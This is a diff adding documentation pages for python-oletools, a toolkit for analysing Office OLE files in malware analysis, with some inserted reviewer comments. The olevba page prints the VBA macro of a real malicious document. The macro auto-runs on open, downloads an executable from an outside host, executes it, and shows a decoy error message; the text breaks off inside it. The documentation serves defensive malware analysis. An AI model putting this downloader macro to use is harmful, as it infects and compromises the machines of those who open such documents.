diff --git a/oletools/doc/Contribute.html b/oletools/doc/Contribute.html new file mode 100644 index 0000000..fc97258 --- /dev/null +++ b/oletools/doc/Contribute.html @@ -0,0 +1,34 @@ + + + + + + + + + +

How to Suggest Improvements, Report Issues or Contribute

+

This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.

+

To suggest improvements, report a bug or any issue, please use the issue reporting page, providing all the information and files to reproduce the problem.

+

You may also contact the author directly to provide feedback.

+

The code is available in a Mercurial repository on Bitbucket. You may use it to submit enhancements using forks and pull requests.

+
+

python-oletools documentation
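Review bot: the issue-tracker link in the Contribute page (the `[issue reporting page](https://bitbucket.org/decalage/olefileio_pl/issues?status=new&status=open)` line in Contribute.md; same paragraph, link stripped, in Contribute.html) points at the olefileio_pl project, while the repository link two paragraphs later and the Home page's Quick links both use https://bitbucket.org/decalage/oletools. Bug reports for oletools filed from this page will land in the wrong tracker; change it to https://bitbucket.org/decalage/oletools/issues?status=new&status=open so it matches Home.md.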

+ + + diff --git a/oletools/doc/Contribute.md b/oletools/doc/Contribute.md new file mode 100644 index 0000000..770784e --- /dev/null +++ b/oletools/doc/Contribute.md @@ -0,0 +1,28 @@ +How to Suggest Improvements, Report Issues or Contribute +======================================================== + +This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome. + +To **suggest improvements, report a bug or any issue**, please use the [issue reporting page](https://bitbucket.org/decalage/olefileio_pl/issues?status=new&status=open), providing all the information and files to reproduce the problem. + +You may also [contact the author](http://decalage.info/contact) directly to **provide feedback**. + +The code is available in [a Mercurial repository on Bitbucket](https://bitbucket.org/decalage/oletools). You may use it to **submit enhancements** using forks and pull requests. + +-------------------------------------------------------------------------- + +python-oletools documentation +----------------------------- + +- [[Home]] +- [[License]] +- [[Install]] +- [[Contribute]], Suggest Improvements or Report Issues +- Tools: + - [[olebrowse]] + - [[oleid]] + - [[olemeta]] + - [[oletimes]] + - [[olevba]] + - [[pyxswf]] + - [[rtfobj]] \ No newline at end of file diff --git a/oletools/doc/Home.html b/oletools/doc/Home.html new file mode 100644 index 0000000..1d3ca7d --- /dev/null +++ b/oletools/doc/Home.html @@ -0,0 +1,45 @@ + + + + + + + + + +

python-oletools v0.06 documentation

+

This is the home page of the documentation for python-oletools. The latest version can be found online, otherwise a copy is provided in the doc subfolder of the package.

+

python-oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis and debugging. It is based on the OleFileIO_PL parser. See http://www.decalage.info/python/oletools for more info.

+

Quick links: Home page - Download - Documentation - Report Issues/Suggestions/Questions - Contact the author - Repository - Updates on Twitter

+

Note: python-oletools is not related to OLETools published by BeCubed Software.

+

Tools in python-oletools:

+ +
+

python-oletools documentation

+ + + diff --git a/oletools/doc/Home.md b/oletools/doc/Home.md new file mode 100644 index 0000000..21479e8 --- /dev/null +++ b/oletools/doc/Home.md 
@@ -0,0 +1,43 @@ +python-oletools v0.06 documentation +=================================== + +This is the home page of the documentation for python-oletools. The latest version can be found [online](https://bitbucket.org/decalage/oletools/wiki), otherwise a copy is provided in the doc subfolder of the package. + +[python-oletools](http://www.decalage.info/python/oletools) is a package of python tools to analyze [Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format)](http://en.wikipedia.org/wiki/Compound_File_Binary_Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis and debugging. It is based on the [OleFileIO_PL](http://www.decalage.info/python/olefileio) parser. See [http://www.decalage.info/python/oletools](http://www.decalage.info/python/oletools) for more info. + +**Quick links:** [Home page](http://www.decalage.info/python/oletools) - [Download](https://bitbucket.org/decalage/oletools/downloads) - [Documentation](https://bitbucket.org/decalage/oletools/wiki) - [Report Issues/Suggestions/Questions](https://bitbucket.org/decalage/oletools/issues?status=new&status=open) - [Contact the author](http://decalage.info/contact) - [Repository](https://bitbucket.org/decalage/oletools) - [Updates on Twitter](https://twitter.com/decalage2) + +Note: python-oletools is not related to OLETools published by BeCubed Software. + +Tools in python-oletools: +------------------------- + +- **[[olebrowse]]**: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to + view and extract individual data streams. +- **[[oleid]]**: a tool to analyze OLE files to detect specific characteristics usually found in malicious files. +- **[[olemeta]]**: a tool to extract all standard properties (metadata) from OLE files. +- **[[oletimes]]**: a tool to extract creation and modification timestamps of all streams and storages. 
+- **[[olevba]]**: a tool to extract VBA Macro source code from MS Office documents (OLE and OpenXML). +- **[[pyxswf]]**: a tool to detect, extract and analyze Flash objects (SWF) that may + be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, + which is especially useful for malware analysis. +- **[[rtfobj]]**: a tool and python module to extract embedded objects from RTF files. +- and a few others (coming soon) + +-------------------------------------------------------------------------- + +python-oletools documentation +----------------------------- + +- [[Home]] +- [[License]] +- [[Install]] +- [[Contribute]], Suggest Improvements or Report Issues +- Tools: + - [[olebrowse]] + - [[oleid]] + - [[olemeta]] + - [[oletimes]] + - [[olevba]] + - [[pyxswf]] + - [[rtfobj]] \ No newline at end of file diff --git a/oletools/doc/Install.html b/oletools/doc/Install.html new file mode 100644 index 0000000..59a061e --- /dev/null +++ b/oletools/doc/Install.html @@ -0,0 +1,38 @@ + + + + + + + + + +

How to Download and Install python-oletools

+

Pre-requisites

+

For now, python-oletools require Python 2.x. They are not compatible with Python 3.x yet.

+

For command-line tools

+

To use python-oletools from the command line as analysis tools, you may simply download the zip archive and extract the files in the directory of your choice.

+

You may then add the directory to your PATH environment variable to access the tools from anywhere.

+

For python applications

+

If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use "pip install oletools" or "easy_install oletools" to download and install the package in one go.

+

Otherwise you may download/extract the zip archive in a temporary directory and run "python setup.py install".

+
+

python-oletools documentation
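Review bot: the command-line install path ("download the zip archive and extract the files in the directory of your choice", then add the directory to PATH) says nothing about the OleFileIO_PL parser that Home.html/Home.md say the tools are built on, so a reader following only this page cannot tell whether it ships in the thirdparty folder mentioned on the License page or must be installed first; state that here for both Install.html and Install.md. Minor grammar in Pre-requisites: "python-oletools require Python 2.x. They are not compatible with Python 3.x yet." treats the package name as plural; "requires" and "It is not compatible" read better.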

+ + + diff --git a/oletools/doc/Install.md b/oletools/doc/Install.md new file mode 100644 index 0000000..8cc90e8 --- /dev/null +++ b/oletools/doc/Install.md @@ -0,0 +1,40 @@ +How to Download and Install python-oletools +=========================================== + +Pre-requisites +-------------- + +For now, python-oletools require Python 2.x. They are not compatible with Python 3.x yet. + + +For command-line tools +---------------------- + +To use python-oletools from the command line as analysis tools, you may simply [download the zip archive](https://bitbucket.org/decalage/oletools/downloads) and extract the files in the directory of your choice. + +You may then add the directory to your PATH environment variable to access the tools from anywhere. + +For python applications +---------------------- + +If you plan to use python-oletools with other Python applications or your own scripts, the simplest solution is to use "**pip install oletools**" or "**easy_install oletools**" to download and install the package in one go. + +Otherwise you may download/extract the [zip archive](https://bitbucket.org/decalage/oletools/downloads) in a temporary directory and run "**python setup.py install**". + +-------------------------------------------------------------------------- + +python-oletools documentation +----------------------------- + +- [[Home]] +- [[License]] +- [[Install]] +- [[Contribute]], Suggest Improvements or Report Issues +- Tools: + - [[olebrowse]] + - [[oleid]] + - [[olemeta]] + - [[oletimes]] + - [[olevba]] + - [[pyxswf]] + - [[rtfobj]] \ No newline at end of file diff --git a/oletools/doc/License.html b/oletools/doc/License.html new file mode 100644 index 0000000..b63fa15 --- /dev/null +++ b/oletools/doc/License.html @@ -0,0 +1,51 @@ + + + + + + + + + +

License for python-oletools

+

This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license.

+

The python-oletools package is copyright (c) 2012-2014 Philippe Lagadec (http://www.decalage.info)

+

All rights reserved.

+

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

+ +

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

+ + + + + + +
License for officeparser
+

olevba contains modified source code from the officeparser project, published under the following MIT License (MIT):

+

officeparser is copyright (c) 2014 John William Davison

+

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

+

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

+

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

+
+

python-oletools documentation

+ + + diff --git a/oletools/doc/License.md b/oletools/doc/License.md new file mode 100644 index 0000000..c58cf46 --- /dev/null +++ b/oletools/doc/License.md 
@@ -0,0 +1,74 @@ +License for python-oletools +=========================== + +This license applies to the [python-oletools](http://www.decalage.info/python/oletools) package, apart from the thirdparty folder which contains third-party files published with their own license. + +The python-oletools package is copyright (c) 2012-2014 Philippe Lagadec ([http://www.decalage.info](http://www.decalage.info)) + +All rights reserved. + +Redistribution and use in source and binary forms, with or without modification, +are permitted provided that the following conditions are met: + + * Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
+ + +---------- +License for officeparser +------------------------ + +olevba contains modified source code from the [officeparser](https://github.com/unixfreak0037/officeparser) project, published +under the following MIT License (MIT): + +officeparser is copyright (c) 2014 John William Davison + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + +-------------------------------------------------------------------------- + +python-oletools documentation +----------------------------- + +- [[Home]] +- [[License]] +- [[Install]] +- [[Contribute]], Suggest Improvements or Report Issues +- Tools: + - [[olebrowse]] + - [[oleid]] + - [[olemeta]] + - [[oletimes]] + - [[olevba]] + - [[pyxswf]] + - [[rtfobj]] \ No newline at end of file diff --git a/oletools/doc/olebrowse.html b/oletools/doc/olebrowse.html new file mode 100644 index 0000000..58d1eb1 --- /dev/null +++ b/oletools/doc/olebrowse.html @@ -0,0 +1,48 @@ + + + + + + + + + +

olebrowse

+

olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.

+

It is part of the python-oletools package.

+

Usage

+
olebrowse.py [file]
+

If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.

+

Screenshots

+

Main menu, showing all streams in the OLE file:

+
+

+
+

Menu with actions for a stream:

+
+

+
+

Hex view for a stream:

+
+

+
+
+

python-oletools documentation

+ + + diff --git a/oletools/doc/olebrowse.md b/oletools/doc/olebrowse.md new file mode 100644 index 0000000..454bffe --- /dev/null +++ b/oletools/doc/olebrowse.md @@ -0,0 +1,47 @@ +olebrowse +========= + +olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to +view and extract individual data streams. + +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package. + +Usage +----- + + olebrowse.py [file] + +If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis. + +Screenshots +----------- + +Main menu, showing all streams in the OLE file: + +![](olebrowse1_menu.png) + +Menu with actions for a stream: + +![](olebrowse2_stream.png) + +Hex view for a stream: + +![](olebrowse3_hexview.png) + +-------------------------------------------------------------------------- + +python-oletools documentation +----------------------------- + +- [[Home]] +- [[License]] +- [[Install]] +- [[Contribute]], Suggest Improvements or Report Issues +- Tools: + - [[olebrowse]] + - [[oleid]] + - [[olemeta]] + - [[oletimes]] + - [[olevba]] + - [[pyxswf]] + - [[rtfobj]] \ No newline at end of file diff --git a/oletools/doc/olebrowse1_menu.png b/oletools/doc/olebrowse1_menu.png new file mode 100644 index 0000000..3c64f5e --- /dev/null +++ b/oletools/doc/olebrowse1_menu.png diff --git a/oletools/doc/olebrowse2_stream.png b/oletools/doc/olebrowse2_stream.png new file mode 100644 index 0000000..fbb7cd0 --- /dev/null +++ b/oletools/doc/olebrowse2_stream.png diff --git a/oletools/doc/olebrowse3_hexview.png b/oletools/doc/olebrowse3_hexview.png new file mode 100644 index 0000000..785f6e6 --- /dev/null +++ b/oletools/doc/olebrowse3_hexview.png 
diff --git a/oletools/doc/oleid.html b/oletools/doc/oleid.html new file mode 100644 index 0000000..8bd7057 --- /dev/null +++ b/oletools/doc/oleid.html @@ -0,0 +1,74 @@ + + + + + + + + + +

oleid

+

oleid is a script to analyze OLE files such as MS Office documents (e.g. Word, Excel), to detect specific characteristics usually found in malicious files (e.g. malware). For example it can detect VBA macros and embedded Flash objects.

+

It is part of the python-oletools package.

+

Main Features

+ +

Planned improvements:

+ +

Usage

+
oleid.py <file>
+

Example

+

Analyzing a Word document containing a Flash object and VBA macros:

+
C:\oletools>oleid.py word_flash_vba.doc
+
+Filename: word_flash_vba.doc
+OLE format: True
+Has SummaryInformation stream: True
+Application name: Microsoft Office Word
+Encrypted: False
+Word Document: True
+VBA Macros: True
+Excel Workbook: False
+PowerPoint Presentation: False
+Visio Drawing: False
+ObjectPool: True
+Flash objects: 1
+

How to use oleid in Python applications

+

TODO

+
+

python-oletools documentation
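Review bot: the Main Features list says "Detect VBA Macros" while Planned improvements lists "Generic VBA macros detection", "Detect auto-executable VBA macros" and "Support for OpenXML files and embedded OLE files", so the current check is evidently tied to specific OLE structures and does not look inside .docm/.xlsm at all; the page should say what "VBA Macros: True" in the example actually tests, otherwise an analyst will read "VBA Macros: False" as a clean verdict on a file the check never inspected. A one-line caveat under the Example plus a pointer to olevba, whose page states OpenXML support, would close that gap. Same text in oleid.md.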

+ + + diff --git a/oletools/doc/oleid.md b/oletools/doc/oleid.md new file mode 100644 index 0000000..fa12911 --- /dev/null +++ b/oletools/doc/oleid.md 
@@ -0,0 +1,77 @@ +oleid +===== + +oleid is a script to analyze OLE files such as MS Office documents (e.g. Word, +Excel), to detect specific characteristics usually found in malicious files (e.g. malware). +For example it can detect VBA macros and embedded Flash objects. + +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package. + +## Main Features + +- Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, ...) +- Detect VBA Macros +- Detect embedded Flash objects +- Detect embedded OLE objects +- Detect MS Office encryption +- Can be used as a command-line tool +- Python API to integrate it in your applications + +Planned improvements: + +- Extract the most important metadata fields +- Support for OpenXML files and embedded OLE files +- Generic VBA macros detection +- Detect auto-executable VBA macros +- Extended OLE file types detection +- Detect unusual OLE structures (fragmentation, unused sectors, etc) +- Options to scan multiple files +- Options to scan files from encrypted zip archives +- CSV output + +## Usage + + :::text + oleid.py + +### Example + +Analyzing a Word document containing a Flash object and VBA macros: + + :::text + C:\oletools>oleid.py word_flash_vba.doc + + Filename: word_flash_vba.doc + OLE format: True + Has SummaryInformation stream: True + Application name: Microsoft Office Word + Encrypted: False + Word Document: True + VBA Macros: True + Excel Workbook: False + PowerPoint Presentation: False + Visio Drawing: False + ObjectPool: True + Flash objects: 1 + +## How to use oleid in Python applications + +TODO + +-------------------------------------------------------------------------- + +python-oletools documentation +----------------------------- + +- [[Home]] +- [[License]] +- [[Install]] +- [[Contribute]], Suggest Improvements or Report Issues +- Tools: + - [[olebrowse]] + - [[oleid]] + - [[olemeta]] + - [[oletimes]] + - [[olevba]] + - [[pyxswf]] + - [[rtfobj]] \ No newline at 
end of file diff --git a/oletools/doc/olemeta.html b/oletools/doc/olemeta.html new file mode 100644 index 0000000..c0254c1 --- /dev/null +++ b/oletools/doc/olemeta.html @@ -0,0 +1,90 @@ + + + + + + + + + +

olemeta

+

olemeta is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract all standard properties present in the OLE file.

+

It is part of the python-oletools package.

+

Usage

+
olemeta.py <file>
+

Example

+

Checking the malware sample DIAN_caso-5415.doc:

+
>olemeta.py DIAN_caso-5415.doc
+
+Properties from SummaryInformation stream:
+- codepage: 1252
+- title: 'Gu\xeda MIPYME para ser emisor electr\xf3nico'
+- subject: ''
+- author: 'OFEyDV'
+- keywords: ''
+- comments: ''
+- template: 'Normal.dotm'
+- last_saved_by: 'clein'
+- revision_number: '13'
+- total_edit_time: 4800L
+- last_printed: datetime.datetime(2006, 6, 7, 14, 4)
+- create_time: datetime.datetime(2009, 3, 30, 14, 18)
+- last_saved_time: datetime.datetime(2014, 5, 14, 12, 45)
+- num_pages: 7
+- num_words: 269
+- num_chars: 1485
+- thumbnail: None
+- creating_application: 'Microsoft Office Word'
+- security: 0
+
+Properties from DocumentSummaryInformation stream:
+- codepage_doc: 1252
+- category: None
+- presentation_target: None
+- bytes: None
+- lines: 12
+- paragraphs: 3
+- slides: None
+- notes: None
+- hidden_slides: None
+- mm_clips: None
+- scale_crop: False
+- heading_pairs: None
+- titles_of_parts: None
+- manager: None
+- company: 'Servicio de Impuestos Internos'
+- links_dirty: False
+- chars_with_spaces: 1751
+- unused: None
+- shared_doc: False
+- link_base: None
+- hlinks: None
+- hlinks_changed: False
+- version: 786432
+- dig_sig: None
+- content_type: None
+- content_status: None
+- language: None
+- doc_version: None
+

How to use olemeta in Python applications

+

TODO

+
+

python-oletools documentation
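Review bot: the example prints property values as raw Python reprs (- title: 'Gu\xeda MIPYME para ser emisor electr\xf3nico', - total_edit_time: 4800L, - last_printed: datetime.datetime(2006, 6, 7, 14, 4)), and the string properties are undecoded bytes in the code page announced by the first property (- codepage: 1252); the page does not say so. Add a sentence that title, author, last_saved_by and company must be decoded with that codepage before being compared, searched or pivoted on, or have the tool print them decoded, in both olemeta.html and olemeta.md.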

+ + + diff --git a/oletools/doc/olemeta.md b/oletools/doc/olemeta.md new file mode 100644 index 0000000..3e67505 --- /dev/null +++ b/oletools/doc/olemeta.md 
@@ -0,0 +1,92 @@ +olemeta +======= + +olemeta is a script to parse OLE files such as MS Office documents (e.g. Word, +Excel), to extract all standard properties present in the OLE file. + +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package. + +## Usage + + :::text + olemeta.py + +### Example + +Checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/): + + :::text + >olemeta.py DIAN_caso-5415.doc + + Properties from SummaryInformation stream: + - codepage: 1252 + - title: 'Gu\xeda MIPYME para ser emisor electr\xf3nico' + - subject: '' + - author: 'OFEyDV' + - keywords: '' + - comments: '' + - template: 'Normal.dotm' + - last_saved_by: 'clein' + - revision_number: '13' + - total_edit_time: 4800L + - last_printed: datetime.datetime(2006, 6, 7, 14, 4) + - create_time: datetime.datetime(2009, 3, 30, 14, 18) + - last_saved_time: datetime.datetime(2014, 5, 14, 12, 45) + - num_pages: 7 + - num_words: 269 + - num_chars: 1485 + - thumbnail: None + - creating_application: 'Microsoft Office Word' + - security: 0 + + Properties from DocumentSummaryInformation stream: + - codepage_doc: 1252 + - category: None + - presentation_target: None + - bytes: None + - lines: 12 + - paragraphs: 3 + - slides: None + - notes: None + - hidden_slides: None + - mm_clips: None + - scale_crop: False + - heading_pairs: None + - titles_of_parts: None + - manager: None + - company: 'Servicio de Impuestos Internos' + - links_dirty: False + - chars_with_spaces: 1751 + - unused: None + - shared_doc: False + - link_base: None + - hlinks: None + - hlinks_changed: False + - version: 786432 + - dig_sig: None + - content_type: None + - content_status: None + - language: None + - doc_version: None + +## How to use olemeta in Python applications + +TODO + +-------------------------------------------------------------------------- + +python-oletools documentation +----------------------------- + +- [[Home]] +- 
[[License]] +- [[Install]] +- [[Contribute]], Suggest Improvements or Report Issues +- Tools: + - [[olebrowse]] + - [[oleid]] + - [[olemeta]] + - [[oletimes]] + - [[olevba]] + - [[pyxswf]] + - [[rtfobj]] \ No newline at end of file diff --git a/oletools/doc/oletimes.html b/oletools/doc/oletimes.html new file mode 100644 index 0000000..f5f4d0c --- /dev/null +++ b/oletools/doc/oletimes.html @@ -0,0 +1,58 @@ + + + + + + + + + +

oletimes

+

oletimes is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract creation and modification times of all streams and storages in the OLE file.

+

It is part of the python-oletools package.

+

Usage

+
oletimes.py <file>
+

Example

+

Checking the malware sample DIAN_caso-5415.doc:

+
>oletimes.py DIAN_caso-5415.doc
+
+- Root mtime=2014-05-14 12:45:24.752000 ctime=None
+- '\x01CompObj': mtime=None ctime=None
+- '\x05DocumentSummaryInformation': mtime=None ctime=None
+- '\x05SummaryInformation': mtime=None ctime=None
+- '1Table': mtime=None ctime=None
+- 'Data': mtime=None ctime=None
+- 'Macros': mtime=2014-05-14 12:45:24.708000 ctime=2014-05-14 12:45:24.355000
+- 'Macros/PROJECT': mtime=None ctime=None
+- 'Macros/PROJECTwm': mtime=None ctime=None
+- 'Macros/VBA': mtime=2014-05-14 12:45:24.684000 ctime=2014-05-14 12:45:24.355000
+- 'Macros/VBA/ThisDocument': mtime=None ctime=None
+- 'Macros/VBA/_VBA_PROJECT': mtime=None ctime=None
+- 'Macros/VBA/__SRP_0': mtime=None ctime=None
+- 'Macros/VBA/__SRP_1': mtime=None ctime=None
+- 'Macros/VBA/__SRP_2': mtime=None ctime=None
+- 'Macros/VBA/__SRP_3': mtime=None ctime=None
+- 'Macros/VBA/dir': mtime=None ctime=None
+- 'WordDocument': mtime=None ctime=None
+

How to use oletimes in Python applications

+

TODO

+
+

python-oletools documentation
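Review bot: the example shows mtime=None ctime=None for every stream and real values only on Root, Macros and Macros/VBA, but the text does not explain that this is the expected result (the OLE directory carries timestamps on storages, the stream entries are normally left zeroed, which is what None reflects) nor that these values are ordinary fields in the file that whoever wrote it can set to anything; without that, readers will take None as a parsing failure and a present timestamp as trustworthy. Add the caveat, and point out the corroboration the sample actually gives: "- Root mtime=2014-05-14 12:45:24.752000" and "- 'Macros/VBA': mtime=2014-05-14 12:45:24.684000 ctime=2014-05-14 12:45:24.355000" agree with last_saved_time: datetime.datetime(2014, 5, 14, 12, 45) from the olemeta page on the same sample, i.e. the VBA project was written at the final save. Same text in oletimes.md.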

+ + + diff --git a/oletools/doc/oletimes.md b/oletools/doc/oletimes.md new file mode 100644 index 0000000..3d24c7f --- /dev/null +++ b/oletools/doc/oletimes.md 
@@ -0,0 +1,61 @@ +oletimes +======== + +oletimes is a script to parse OLE files such as MS Office documents (e.g. Word, +Excel), to extract creation and modification times of all streams and storages +in the OLE file. + +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package. + +## Usage + + :::text + oletimes.py + +### Example + +Checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/): + + :::text + >oletimes.py DIAN_caso-5415.doc + + - Root mtime=2014-05-14 12:45:24.752000 ctime=None + - '\x01CompObj': mtime=None ctime=None + - '\x05DocumentSummaryInformation': mtime=None ctime=None + - '\x05SummaryInformation': mtime=None ctime=None + - '1Table': mtime=None ctime=None + - 'Data': mtime=None ctime=None + - 'Macros': mtime=2014-05-14 12:45:24.708000 ctime=2014-05-14 12:45:24.355000 + - 'Macros/PROJECT': mtime=None ctime=None + - 'Macros/PROJECTwm': mtime=None ctime=None + - 'Macros/VBA': mtime=2014-05-14 12:45:24.684000 ctime=2014-05-14 12:45:24.355000 + - 'Macros/VBA/ThisDocument': mtime=None ctime=None + - 'Macros/VBA/_VBA_PROJECT': mtime=None ctime=None + - 'Macros/VBA/__SRP_0': mtime=None ctime=None + - 'Macros/VBA/__SRP_1': mtime=None ctime=None + - 'Macros/VBA/__SRP_2': mtime=None ctime=None + - 'Macros/VBA/__SRP_3': mtime=None ctime=None + - 'Macros/VBA/dir': mtime=None ctime=None + - 'WordDocument': mtime=None ctime=None + +## How to use oletimes in Python applications + +TODO + +-------------------------------------------------------------------------- + +python-oletools documentation +----------------------------- + +- [[Home]] +- [[License]] +- [[Install]] +- [[Contribute]], Suggest Improvements or Report Issues +- Tools: + - [[olebrowse]] + - [[oleid]] + - [[olemeta]] + - [[oletimes]] + - [[olevba]] + - [[pyxswf]] + - [[rtfobj]] \ No newline at end of file 
diff --git a/oletools/doc/olevba.html b/oletools/doc/olevba.html new file mode 100644 index 0000000..689e882 --- /dev/null +++ b/oletools/doc/olevba.html @@ -0,0 +1,87 @@ + + + + + + + + + +

olevba

+

olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to extract VBA Macro code in clear text.

+

It is part of the python-oletools package.

+

Supported formats:

+
    +
  • Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
  • +
  • Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
  • +
  • PowerPoint 2007+ (.pptm, .ppsm)
  • +
+

olevba is based on source code from officeparser by John William Davison

+

Usage

+
olevba.py <file>
+

Example

+

Checking the malware sample DIAN_caso-5415.doc:

+
>olevba.py DIAN_caso-5415.doc
+
+INFO: Extracting VBA Macros from OLE file DIAN_caso-5415.doc
+
+-------------------------------------------------------------------------------
+ThisDocument.cls
+
+Attribute VB_Name = "ThisDocument"
+Attribute VB_Base = "1Normal.ThisDocument"
+Attribute VB_GlobalNameSpace = False
+Attribute VB_Creatable = False
+Attribute VB_PredeclaredId = True
+Attribute VB_Exposed = True
+Attribute VB_TemplateDerived = True
+Attribute VB_Customizable = True
+Option Explicit
+Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal FVQGKS As Long, _
+ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
+ByVal HQTLDG As Long) As Long
+Sub AutoOpen()
+    Auto_Open
+End Sub
+Sub Auto_Open()
+SNVJYQ
+End Sub
+Public Sub SNVJYQ()
+    OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero.exe"
+End Sub
+Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
+    Dim HRKUYU, lala As Long
+    HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
+    If HRKUYU = 0 Then OGEXYR = True
+    Dim YKPZZS
+    YKPZZS = Shell(PHHWIV, 1)
+    MsgBox "El contenido de este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no compatible"
